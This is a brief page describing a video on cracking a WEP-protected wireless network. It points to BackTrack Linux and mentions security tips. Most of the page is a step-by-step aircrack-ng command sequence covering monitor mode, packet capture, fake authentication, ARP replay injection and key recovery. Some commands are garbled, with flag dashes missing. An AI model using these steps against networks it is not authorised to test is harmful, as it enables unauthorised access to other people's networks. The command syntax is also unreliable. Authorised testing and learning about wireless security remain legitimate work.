How To Hack Wireless
#############################
Video Source: www.youtube.com/watch?v=jETwvEDaJeQ
This video shows one method of hacking a wireless WEP connection and gives you some tips on how to better secure your wireless. • WEBSITES: • http://www.backtrack-linux.org • http://www.imgburn.com • TERMINAL COMMANDS: • Startx • /etc/init.d/networking start • airmon-ng • airmon-ng stop [wireless card name] • airmon-ng start [wireless card name] • airmon-ng • airodump-ng [wireless card name] • ctrl c • airodump-ng w wep c [channel number] bssid [Bssid number] [wireless card name] • aireplay-ng -1 0 a [bssid] [wireless card name] • aireplay-ng -3 b [bssid][wireless card name] • ctrl + c • dir • aircrack-ng [filename]
#############################